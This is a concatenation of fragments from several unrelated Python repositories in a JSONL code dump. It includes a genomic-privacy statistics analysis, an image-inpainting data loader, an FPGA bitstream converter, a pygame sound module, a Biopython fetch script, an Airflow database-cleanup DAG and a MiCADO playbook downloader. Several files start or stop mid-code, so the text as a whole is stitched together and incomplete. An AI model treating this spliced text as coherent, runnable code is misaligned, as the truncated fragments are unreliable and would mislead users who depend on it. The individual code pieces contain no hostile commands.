3, 3.1, 0]\r\nelse:\r\n scenarios = [5]\r\n\r\nfor i_scenario in range(len(scenarios)):\r\n scenario = scenarios[i_scenario]\r\n for explicit_usage in range(2):\r\n for targeted_attribute in range(2):\r\n if stat_type < 14: # one-variable summary statistics\r\n a = np.empty([n_iter, 2+m_g+1])\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',',\r\n skip_header=1).astype(int)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',')\r\n for j in range(2+m_g):\r\n S1 = S[:, j]\r\n # From Age to Birth_year\r\n if j == 0:\r\n S1 = 2020-S1\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, j]\r\n S_output = S1[array_opt_strategy1 > 0]\r\n else:\r\n S_output = S1\r\n if stat_type == 1: # sharing rate\r\n S_stat = S_output.size/n_S\r\n S1_stat = S1.size/n_S\r\n elif stat_type == 2: # number of distinct values\r\n S_stat = np.unique(S_output).size\r\n S1_stat = np.unique(S1).size\r\n elif stat_type == 3: # entropy\r\n values, counts = np.unique(S_output, return_counts=True)\r\n S_stat = entropy(counts)\r\n values1, counts1 = np.unique(S1, return_counts=True)\r\n S1_stat = entropy(counts1)\r\n elif stat_type == 4: # mean\r\n S_stat = np.mean(S_output)\r\n S1_stat = np.mean(S1)\r\n elif stat_type == 5: # standard deviation\r\n S_stat = np.std(S_output)\r\n S1_stat = np.std(S1)\r\n elif stat_type == 6: # skewness\r\n S_stat = skew(S_output)\r\n S1_stat = skew(S1)\r\n elif stat_type == 7: # gini coefficient\r\n S_stat = sf.gini(S_output.astype(np.float))\r\n S1_stat = sf.gini(S1.astype(np.float))\r\n elif stat_type == 8: # min\r\n S_stat = np.amin(S_output)\r\n S1_stat = np.amin(S1)\r\n elif stat_type == 9: # Q1\r\n S_stat = np.quantile(S_output, .25)\r\n S1_stat = np.quantile(S1, .25)\r\n elif stat_type == 10: # median\r\n S_stat = np.median(S_output)\r\n S1_stat = np.median(S1)\r\n elif stat_type == 11: # Q3\r\n S_stat = np.quantile(S_output, .75)\r\n S1_stat = np.quantile(S1, .75)\r\n elif stat_type == 12: # max\r\n S_stat = np.amax(S_output)\r\n S1_stat = np.amax(S1)\r\n elif np.floor(stat_type) == 13: # KL divergence (relative entropy), or variational distance, or EMD\r\n values, counts = np.unique(S1, return_counts=True)\r\n counts2 = np.copy(counts)\r\n for k in range(values.size):\r\n counts2[k] = np.count_nonzero(S_output == values[k])\r\n if np.sum(counts2) == 0:\r\n S_stat = 1\r\n print('Undefined distance!')\r\n elif counts.size == 1:\r\n S_stat = 0\r\n print('One-point distribution!')\r\n else:\r\n p = counts/np.sum(counts)\r\n q = counts2/np.sum(counts2)\r\n if stat_type == 13: # reverse KL divergence\r\n S_stat = np.sum(rel_entr(q, p))\r\n elif stat_type == 13.2: # self-implemented variational distance\r\n S_stat = variational_distance(p, q)\r\n elif stat_type == 13.3: # self-implemented EMD\r\n t = (j == 1) + 0 # 0: numerical, 1: categorical\r\n S_stat = earth_movers_distance(p, q, t)\r\n elif stat_type == 13.4: # EMD in scipy\r\n S_stat = wasserstein_distance(p, q)\r\n else:\r\n S_stat = 0\r\n print('Invalid stat_type!')\r\n if np.floor(stat_type) < 13:\r\n if stat_type >= 4 and stat_type <= 12: # numerical attributes\r\n a[i, j] = np.abs(S_stat - S1_stat)\r\n else:\r\n a[i, j] = np.abs(S_stat - S1_stat) / S1_stat\r\n else:\r\n a[i, j] = S_stat\r\n # calculate weighted sum\r\n if stat_type >= 4 and stat_type <= 12: #numerical attributes\r\n a_temp = a[i, 0:(2 + m_g)]\r\n a_temp[1] = 0\r\n a[i, 2 + m_g] = np.sum(a_temp) / (a_temp.size - 1)\r\n else:\r\n a[i, 2 + m_g] = np.dot(a[i, 0:(2 + m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n filename = folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.txt'\r\n f = open(filename, 'w')\r\n array_output = np.empty([2, 2+m_g+1])\r\n for j in range(2+m_g+1):\r\n a1 = a[:, j]\r\n a1_mean = np.mean(a1)\r\n a1_std = np.std(a1)\r\n array_output[0, j] = a1_mean\r\n array_output[1, j] = a1_std\r\n print('j=' + str(j) + ': mean = ' + str(a1_mean) + ', SD= ' + str(a1_std))\r\n f.write('j=' + str(j) + ': mean = ' + str(a1_mean) + ', SD= ' + str(a1_std) + '\\n')\r\n f.close()\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.csv', array_output,\r\n delimiter=',')\r\n\r\n elif stat_type == 14: # two-variable summary statistics\r\n a = np.empty([n_iter, 2 + m_g, 2 + m_g])\r\n b = np.empty([n_iter, 2 + m_g + 1])\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',', skip_header=1)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(\r\n folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',')\r\n for j in range(2 + m_g):\r\n for k in range(2 + m_g):\r\n if j == k:\r\n S_stat = 0\r\n S1_stat = 0\r\n else:\r\n S1 = S[:, j]\r\n S2 = S[:, k]\r\n # From Age to Birth_year\r\n if j == 0:\r\n S1 = 2020 - S1\r\n if k == 0:\r\n S2 = 2020 - S2\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, j]\r\n array_opt_strategy2 = array_opt_strategy[:, k]\r\n S1_output = S1[np.logical_and(array_opt_strategy1 > 0, array_opt_strategy2 > 0)]\r\n S2_output = S2[np.logical_and(array_opt_strategy1 > 0, array_opt_strategy2 > 0)]\r\n else:\r\n S1_output = S1\r\n S2_output = S2\r\n if stat_type == 14: # pearson correlation\r\n if S1_output.size == 0 or S2_output.size == 0:\r\n S_stat, pval = 0, 0\r\n elif S1_output.size == 1 or S2_output.size == 1:\r\n S_stat, pval = 1, 0\r\n else:\r\n #S_stat, pval = pearsonr(S1_output, S2_output)\r\n S_stat, pval = spearmanr(S1_output, S2_output)\r\n if S1.size == 0 or S2.size == 0:\r\n S1_stat, pval1 = 0, 0\r\n elif S1.size == 1 or S2.size == 1:\r\n S1_stat, pval1 = 1, 0\r\n else:\r\n S1_stat, pval1 = spearmanr(S1, S2)\r\n else:\r\n S_stat, pval = 0, 0\r\n S1_stat, pval1 = 0, 0\r\n print('Invalid stat_type!')\r\n if np.isnan(np.abs(S_stat - S1_stat)):\r\n a[i, j, k] = 0\r\n else:\r\n a[i, j, k] = np.abs(S_stat - S1_stat)\r\n b[i, 0:(2+m_g)] = np.mean(a[i, :, :], axis=1) * 13\r\n b[i, 2+m_g] = np.dot(b[i, 0:(2+m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n filename = folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.txt'\r\n f = open(filename, 'w')\r\n avg_array_output = np.mean(b, axis=0)\r\n print(str(avg_array_output))\r\n f.write(str(avg_array_output))\r\n f.close()\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.csv', avg_array_output, delimiter=',')\r\n\r\n elif np.floor(stat_type) == 15: # one-variable summary statistics for each demographic group (one attribute)\r\n group_hr_birth_year = list(range(1910, 2000, 10)) # [1910, 1920, 1930, 1940, 1950, 1960, 1970, ..., 1990]\r\n group_hr_state = list(range(11, 51, 10)) # [11, 21, 31, 41]\r\n\r\n if targeted_attribute == 0:\r\n group_hr = group_hr_birth_year\r\n else:\r\n group_hr = group_hr_state\r\n n_groups = len(group_hr) + 1\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n a = np.zeros([n_iter, n_groups + 2, 2]) # [...] * [..., W_Avg, (1-Gini)] * [metric, size]\r\n if algorithm == 1 and scenario >= 5:\r\n folder_result = folder_result.replace('Violin/m' + str(method), 'Violin_bf')\r\n if stat_type < 15.8:\r\n if not save_iter[np.floor(scenario).astype(int)]:\r\n dataset = pd.read_pickle(folder_result + 'result_s' + str(scenario) + '.pickle')\r\n ii = np.round((stat_type - 15.5) * 10).astype(int)\r\n if save_iter[np.floor(scenario).astype(int)]:\r\n shaped_data = np.empty([n_iter, n_S])\r\n for k in range(n_iter): # for each iteration\r\n dataset = pd.read_pickle(folder_result + 'result_s' + str(scenario) + '_i' + str(k) + '.pickle')\r\n data = np.array(dataset[column_names[ii]])\r\n shaped_data[k, :] = data.reshape(1, -1)\r\n else:\r\n data = np.array(dataset[column_names[ii]])\r\n shaped_data = np.reshape(data, (n_iter, n_S))\r\n else: # utility for the dataset\r\n a = np.zeros([n_iter, n_groups + 5, 2 + m_g + 2]) # [.]*[., W_Avg, STD, Gini, Gini2, entropy]*[., W_Avg, size]\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',',\r\n skip_header=1).astype(int)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv', delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(\r\n folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',').astype(int)\r\n elif scenario == 0:\r\n array_opt_strategy = np.ones([n_S, 2+m_g]).astype(int)\r\n S_targeted = S[:, targeted_attribute]\r\n # From Age to Birth_year\r\n if targeted_attribute == 0:\r\n S_targeted = 2020 - S_targeted\r\n memberships = np.copy(S_targeted)\r\n for j in range(n_S): # for each person\r\n index_group = 0\r\n for k in range(n_groups-1): # for each group (excluding the 1st)\r\n if S_targeted[j] < group_hr[k]:\r\n break\r\n else:\r\n index_group += 1\r\n memberships[j] = index_group\r\n\r\n for j in range(n_groups): # for each group\r\n selection = memberships == j\r\n # save group size\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n a[i, j, -1] = np.sum(np.logical_and(selection, array_opt_strategy_targeted > 0))\r\n else:\r\n a[i, j, -1] = np.sum(selection)\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n if np.sum(np.logical_and(selection, array_opt_strategy_targeted > 0)) == 0:\r\n print('group size is zero!')\r\n a[i, j, 0] = 0\r\n else:\r\n if stat_type == 15.8: # sharing rate\r\n a[i, j, 0] = np.mean(array_opt_strategy[\r\n np.logical_and(selection, array_opt_strategy_targeted > 0),\r\n :])\r\n else:\r\n a[i, j, 0] = np.mean(\r\n shaped_data[i, np.logical_and(selection, array_opt_strategy_targeted > 0)])\r\n\r\n else:\r\n if stat_type == 15.8: # sharing rate\r\n a[i, j, 0] = np.mean(array_opt_strategy[selection, :])\r\n else:\r\n a[i, j, 0] = np.mean(array_opt_strategy[selection, :])\r\n continue\r\n\r\n for k in range(2 + m_g): # for each attribute\r\n S1 = S[:, k]\r\n # From Age to Birth_year\r\n if k == 0:\r\n S1 = 2020 - S1\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, k]\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n S_output = S1[np.logical_and.reduce((array_opt_strategy1 > 0, selection,\r\n array_opt_strategy_targeted > 0))] # shared data in this group\r\n else:\r\n S_output = S1[np.logical_and.reduce((array_opt_strategy1 > 0, selection))] # shared data in this group\r\n else: # no protection\r\n S_output = S1[selection]\r\n S1 = S1[selection] # original data in this group\r\n if np.floor(stat_type) == 15: # KL divergence\r\n values, counts = np.unique(S1, return_counts=True)\r\n counts2 = np.copy(counts)\r\n for kk in range(values.size):\r\n counts2[kk] = np.count_nonzero(S_output == values[kk])\r\n if np.sum(counts2) == 0:\r\n S_stat = 1\r\n print('Undefined distance!')\r\n elif counts.size == 1:\r\n S_stat = 0\r\n print('One-point distribution!')\r\n else:\r\n p = counts / np.sum(counts)\r\n q = counts2 / np.sum(counts2)\r\n if stat_type == 15: # reverse KL divergence\r\n S_stat = np.sum(rel_entr(q, p))\r\n elif stat_type == 15.2: # self-implemented variational distance\r\n S_stat = variational_distance(p, q)\r\n elif stat_type == 15.3: # self-implemented EMD\r\n t = (k == 1) + 0 # 0: numerical, 1: categorical\r\n S_stat = earth_movers_distance(p, q, t)\r\n elif stat_type == 15.4: # EMD in scipy\r\n S_stat = wasserstein_distance(p, q)\r\n else:\r\n S_stat = 0\r\n print('Invalid stat_type!')\r\n a[i, j, k] = S_stat\r\n\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n # computer statistics for each iteration\r\n for i in range(start_iter, start_iter + n_iter):\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n # calculate the weighted average\r\n a[i, n_groups, 0] = np.dot(a[i, 0:n_groups, 0], a[i, 0:n_groups, -1]) / np.sum(a[i, 0:n_groups, -1])\r\n a[i, n_groups + 1, 0] = 1 - sf.gini(a[i, 0:n_groups, 0]) # calculate the (1 - gini coefficient)\r\n a[i, n_groups, -1] = np.mean(a[i, 0:n_groups, -1]) # calculate the average\r\n a[i, n_groups + 1, -1] = 1 - sf.gini(a[i, 0:n_groups, -1]) # calculate the (1 - gini coefficient)\r\n else:\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n for j in range(n_groups): # for each group\r\n # calculate the weighted_average\r\n a[i, j, 2+m_g] = np.dot(a[i, j, 0:(2+m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n for k in range(2 + m_g + 1): # for each attribute + 1\r\n # calculate the average\r\n a[i, n_groups, k] = np.dot(a[i, 0:n_groups, k], a[i, 0:n_groups, -1]) / np.sum(a[i, 0:n_groups, -1])\r\n a[i, n_groups + 1, k] = np.std(a[i, 0:n_groups, k]) # calculate the standard deviation\r\n a[i, n_groups + 2, k] = sf.gini(a[i, 0:n_groups, k]) # calculate the gini coefficient\r\n a[i, n_groups + 3, k] = sf.gini(1-a[i, 0:n_groups, k]) # calculate the gini coefficient of (1 - distance)\r\n a[i, n_groups, -1] = np.mean(a[i, 0:n_groups, -1]) # calculate the average\r\n a[i, n_groups + 1, -1] = np.std(a[i, 0:n_groups, -1]) # calculate the standard deviation\r\n a[i, n_groups + 2, -1] = sf.gini(a[i, 0:n_groups, -1]) # calculate the gini coefficient\r\n a[i, n_groups + 4, 0:(2 + m_g)] = weighted_entropy\r\n a[i, n_groups + 4, 2 + m_g] = np.mean(weighted_entropy)\r\n avg_array_output = np.mean(a, axis=0)\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario)\r\n + '_attr' + str(targeted_attribute) + '_exp' + str(explicit_usage) + '.csv',\r\n avg_array_output, delimiter=',')\r\n","repo_name":"zhywan/msrigs","sub_path":"msrigs_simulation_analysis_usefulness_and_fairness.py","file_name":"msrigs_simulation_analysis_usefulness_and_fairness.py","file_ext":"py","file_size_in_byte":26402,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"30796289743","text":"import os\nimport glob\nimport torch\n\nfrom ex4 import ex4\nimport random\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\n\nIMG_SHAPE = 100\nMIN_OFFSET = 0\nMAX_OFFSET = 8\nMIN_SPACING = 2\nMAX_SPACING = 6\nMIN_KNOWN_PIXELS = 144\n\nSPACING = [2, 3, 4, 5, 6]\nOFFSET = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n\n\nclass LoadImages(Dataset):\n def __init__(self, folder):\n self.input_abs = os.path.abspath(folder)\n self.files = []\n\n self.files = (os.path.join(f) for f in glob.glob(os.path.join(self.input_abs, '**', '*.jpg'), recursive=True))\n\n self.files = sorted(self.files)\n\n def __len__(self):\n return len(self.files)\n \n def __getitem__(self, idx):\n resize_transforms = transforms.Compose([\n transforms.Resize(size=IMG_SHAPE),\n transforms.CenterCrop(size=(IMG_SHAPE, IMG_SHAPE)),\n ])\n\n image = Image.open(self.files[idx]).convert('RGB')\n image = resize_transforms(image)\n\n image = np.array(image, dtype=np.float32)\n target, image_arr, known_arr, target_arr = ex4(image,\n (random.choice(OFFSET), random.choice(OFFSET)),\n (random.choice(SPACING), random.choice(SPACING)))\n\n image_arr = np.transpose(image_arr, (2, 0, 1))\n target = np.transpose(target, (2, 0, 1))\n\n return target, image_arr\n\n\ndef stack_with_padding(batch_as_list: list):\n n_samples = len(batch_as_list)\n \n image_shapes = np.stack([np.array(sample[0].shape) for sample in batch_as_list], axis=-1)\n max_image_shape = image_shapes.max(axis=-1)\n \n stacked_images = torch.full(size=(n_samples, *max_image_shape), dtype=torch.float32, fill_value=0.)\n for i in range(n_samples):\n stacked_images[i, :, :batch_as_list[i][0].shape[-2], :batch_as_list[i][0].shape[-1]] \\\n = torch.from_numpy(batch_as_list[i][0])\n\n targets_list = [torch.from_numpy(sample[1]) for sample in batch_as_list]\n ids_list = [sample[2] for sample in batch_as_list]\n return stacked_images, targets_list, ids_list\n\n\nif __name__ == '__main__':\n img_data = LoadImages('training/000')\n img_loader = DataLoader(img_data, shuffle=True, batch_size=5, collate_fn=stack_with_padding)\n\n for i, (inp, trg, ids) in enumerate(img_loader):\n print(f\"Batch {i}:\")\n print(f\"image ids: {ids}\")\n print(f\"batch shape: {inp.shape}\")","repo_name":"medisredzic/image-inpainting","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2242803075","text":"#!/usr/bin/python3.5\nimport binascii\nfrom crc32c import crc32\nimport struct\nimport time\nEND = 1605109\n\n\ndef timer(func):\n\t# decorator without parameter\n\tdef _timer():\n\t\tstart_time = time.time()\n\t\tfunc()\n\t\tend_time = time.time()\n\t\tprint(\"\\nTotal time: \" + str(end_time-start_time))\n\treturn _timer\n\n\ndef ascii2bin(start, end):\n\tcontent = b''\n\twith open(\"pin_test.rbt\", 'r') as f, open('out.bin', 'wb') as fw:\n\t\t# lines = f.readlines()\n\t\tfor line in f.readlines()[start:end]:\n\t\t\tbyte = struct.pack('= len(self._intensity_samples)\n\n def at(self, time_s):\n idx = int(time_s * self._sample_rate)\n if idx >= len(self._intensity_samples):\n return 0\n else:\n return self._intensity_samples[idx]\n\n\nclass IntensityValueSource(ValueSource):\n DELAY = 0\n\n def __init__(self, intensity):\n ValueSource.__init__(self)\n self._intensity = intensity\n self._start_time = self.current_time()\n\n def value(self):\n t = self.current_time() - self._start_time\n if t < IntensityValueSource.DELAY:\n return 0\n else:\n return self._intensity.at(t - IntensityValueSource.DELAY)\n\n def is_finished(self):\n return self._intensity.is_finished_at(self.current_time() - self._start_time)\n\n\n\ndef play_mp3(path):\n pygame.mixer.music.load(path)\n pygame.mixer.music.play()\n\n\ndef play(path, volume=1, stereo=None):\n sound = Clip(path, volume, stereo)\n sound.play()\n return sound\n\n\ndef max_channels():\n return pygame.mixer.get_num_channels()\n\n\ndef wait_until_end():\n while pygame.mixer.get_busy():\n time.sleep(0.2)\n\ndef set_master_volume(volume):\n global _master_volume\n _master_volume = volume\n #for clip in active_clips:\n # clip.update_channel_volume()\n","repo_name":"socha23/ecotron","sub_path":"sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13526500505","text":"# Given: Two GenBank IDs\n# Return: The maximum global alignment score between the DNA strings associated with the IDs\n\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\nwith open('rosalind_need.txt', 'r') as f:\n\tIDs = f.readline().strip().split()\n\nentrez_ids = ''\nfor a in IDs:\n\tentrez_ids += a + ', '\n\nEntrez.email = 'ada.alex.6@gmail.com'\nhandle = Entrez.efetch(db='nucleotide', id=[entrez_ids], rettype=\"fasta\")\nrecords = list (SeqIO.parse(handle, \"fasta\"))\n\n\n# Use this program to get the FASTA sequences and then use NEEDLE from EMBOSS website to\n# perform alignment\nfor record in records:\n\tprint(record.format('fasta'))","repo_name":"adamadejska/Rosalind","sub_path":"NEED.py","file_name":"NEED.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74401918031","text":"\"\"\"\nA maintenance workflow that you can deploy into Airflow to periodically clean\nout the DagRun, TaskInstance, Log, XCom, Job DB and SlaMiss entries, as well\n as task logs to avoid having too much data in your Airflow MetaStore and disc.\nairflow trigger_dag --conf '{\"maxDataAgeInDays\":30}' airflow-log-cleanup\n--conf options:\n maxDataAgeInDays: - Optional\n\"\"\"\nimport os\nimport logging\nfrom datetime import timedelta\nimport dateutil.parser\nimport airflow\nfrom airflow.models import (\n DagRun, TaskInstance, Log, XCom, SlaMiss,\n DagModel, Variable\n)\nfrom airflow.utils import timezone\nfrom airflow.jobs.job import Job\nfrom airflow import settings\nfrom airflow.operators.python import PythonOperator\nfrom sqlalchemy import func, and_\nfrom sqlalchemy.orm import load_only\n\nfrom data_pipeline.utils.dags.data_pipeline_dag_utils import create_dag\n\n\nDAG_ID = \"Airflow_DB_Maintenance\"\nSTART_DATE = airflow.utils.dates.days_ago(1)\nDB_MAINTENANCE_SCHEDULE_INTERVAL_ENV_NAME = (\n \"DB_MAINTENANCE_SCHEDULE_INTERVAL\"\n)\n# Whether the job should delete the db entries or not. Included if you want to\n# temporarily avoid deleting the db entries.\nENABLE_DELETE = True\n# List of all the objects that will be deleted. Comment out the DB objects you\n# want to skip.\nDATABASE_OBJECTS = [\n {\n \"airflow_db_model\": DagRun,\n \"age_check_column\": DagRun.execution_date,\n \"keep_last\": True,\n \"keep_last_filters\": [DagRun.external_trigger is False],\n \"keep_last_group_by\": DagRun.dag_id},\n {\n \"airflow_db_model\": TaskInstance,\n \"age_check_column\": TaskInstance.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": Log,\n \"age_check_column\": Log.dttm,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": XCom,\n \"age_check_column\": XCom.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": Job,\n \"age_check_column\": Job.latest_heartbeat,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": SlaMiss,\n \"age_check_column\": SlaMiss.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": DagModel,\n \"age_check_column\": DagModel.last_parsed_time,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n]\n# pylint: disable=invalid-name\nsession = settings.Session()\n\nDEFAULT_ARGS = {\n 'depends_on_past': False,\n 'email_on_failure': True,\n 'email_on_retry': False,\n 'start_date': START_DATE,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1)\n}\n\nMAINTENANCE_DAG = create_dag(\n dag_id=DAG_ID,\n schedule=os.getenv(\n DB_MAINTENANCE_SCHEDULE_INTERVAL_ENV_NAME\n ),\n dagrun_timeout=timedelta(days=1)\n)\n\n\nDEFAULT_AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS = \"30\"\nMAX_CLEANUP_DATA_AGE_NAME = (\n \"AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS\"\n)\n\n\ndef get_max_data_cleanup_configuration_function(**context):\n max_data_age_in_days = int(\n Variable.get(\n MAX_CLEANUP_DATA_AGE_NAME,\n os.getenv(\n MAX_CLEANUP_DATA_AGE_NAME,\n DEFAULT_AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS\n )\n )\n )\n max_date = timezone.utcnow() + timedelta(-max_data_age_in_days)\n context[\"ti\"].xcom_push(key=\"max_date\", value=max_date.isoformat())\n\n\nget_configuration = PythonOperator(\n task_id='get_configuration',\n python_callable=get_max_data_cleanup_configuration_function,\n dag=MAINTENANCE_DAG\n)\n\n\ndef cleanup_function(**context):\n\n logging.info(\"Retrieving max_execution_date from XCom\")\n max_date = context[\"ti\"].xcom_pull(\n task_ids=get_configuration.task_id, key=\"max_date\"\n )\n max_date = dateutil.parser.parse(max_date) # stored as iso8601 str in xcom\n\n airflow_db_model = context[\"params\"].get(\"airflow_db_model\")\n age_check_column = context[\"params\"].get(\"age_check_column\")\n keep_last = context[\"params\"].get(\"keep_last\")\n keep_last_filters = context[\"params\"].get(\"keep_last_filters\")\n keep_last_group_by = context[\"params\"].get(\"keep_last_group_by\")\n\n logging.info(\"Running Cleanup Process...\")\n query = session.query(airflow_db_model).options(\n load_only(age_check_column)\n )\n if keep_last:\n subquery = session.query(func.max(DagRun.execution_date))\n if keep_last_filters is not None:\n for entry in keep_last_filters:\n subquery = subquery.filter(entry)\n\n if keep_last_group_by is not None:\n subquery = subquery.group_by(keep_last_group_by)\n\n subquery = subquery.from_self()\n\n query = query.filter(\n and_(age_check_column.notin_(subquery)),\n and_(age_check_column <= max_date)\n )\n\n else:\n query = query.filter(age_check_column <= max_date,)\n\n if ENABLE_DELETE:\n logging.info(\"Performing Delete...\")\n # using bulk delete\n query.delete(synchronize_session=False)\n session.commit()\n logging.info(\"Finished Performing Delete\")\n\n logging.info(\"Finished Running Cleanup Process\")\n\n\nfor db_object in DATABASE_OBJECTS:\n\n cleanup_op = PythonOperator(\n task_id='cleanup_' + str(db_object[\"airflow_db_model\"].__name__),\n python_callable=cleanup_function,\n params=db_object,\n dag=MAINTENANCE_DAG\n )\n # pylint: disable=pointless-statement\n get_configuration >> cleanup_op\n","repo_name":"elifesciences/data-hub-core-airflow-dags","sub_path":"dags/dag_maintenance.py","file_name":"dag_maintenance.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"26145451743","text":"import matplotlib.pyplot as plt\nfrom load import get_data\n\ndata = get_data()\n\nheatmap = []\nfor conv in range(20):\n row = []\n for learn in range(20):\n data_list = data[(conv / 10, learn / 10)]\n total = sum([d[\"fitnessSums0\"] + d[\"fitnessSums1\"] + d[\"fitnessSums2\"] for d in data_list])\n row.append(total / 10)\n heatmap.append(row)\n\nplt.imshow(heatmap, cmap=\"hot\", interpolation=\"nearest\")\nplt.ylabel(\"convergence_rate\")\nplt.xlabel(\"learning_rate\")\nplt.show()\n","repo_name":"cooperuser/ctrnn-test","sub_path":"experiments/test/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18818163435","text":"import os\nimport shutil\nimport tarfile\nfrom pathlib import Path\n\nimport ansible_runner\nimport requests\n\nPLAYBOOK_NAME = \"micado.yml\"\nPLAYBOOK_INTERNAL = \"playbook\"\nROTATION = 100 # max number of artifacts (logs, etc...) to keep\nQUIET = True # hide ansible output\n\n\nclass Playbook:\n def __init__(self, version: str, id: str, home_dir: str):\n self.version: str = version\n self.id: str = id\n self.tar_download: Path = Path(f\"{home_dir}micado-{version}.tar.gz\")\n self.playbook_path: Path = Path(f\"{home_dir}micado-{version}\")\n\n def run(self, hosts: dict, extravars: dict, playbook: str = None):\n \"\"\"Run the playbook\"\"\"\n if not self.playbook_exists():\n self.download()\n self.extract()\n \n data_dir = self.playbook_path / PLAYBOOK_INTERNAL\n\n # fix_hosts_permissions() because https://github.com/ansible/ansible-runner/issues/853\n fix_hosts_permissions(data_dir)\n runner = ansible_runner.interface.run(\n ident=self.id,\n playbook=playbook or PLAYBOOK_NAME,\n private_data_dir=str(data_dir),\n inventory=hosts,\n extravars=extravars,\n rotate_artifacts=ROTATION,\n quiet=QUIET,\n )\n fix_hosts_permissions(data_dir)\n return runner\n\n def download(self):\n \"\"\"Download playbook from GitHub and write down to home directory.\"\"\"\n url = f\"https://github.com/micado-scale/ansible-micado/tarball/{self.version}\"\n r = requests.get(url, stream=True)\n\n with open(self.tar_download, \"wb\") as f:\n f.write(r.content)\n\n if not tarfile.is_tarfile(self.tar_download):\n os.remove(self.tar_download)\n raise TypeError(f\"Download failed - check MiCADO {self.version} exists.\")\n\n def extract(self):\n \"\"\"Extract tar to the directory where it was downloaded\"\"\"\n if not os.path.isfile(self.tar_download):\n raise FileNotFoundError(\"Playbook tarball not found. Cannot extract.\")\n\n tar_file = tarfile.open(self.tar_download)\n tar_path = self.tar_download.parent / tar_file.firstmember.name\n tar_file.extractall(self.tar_download.parent)\n tar_file.close()\n\n # Don't overwrite an existing playbook of the same 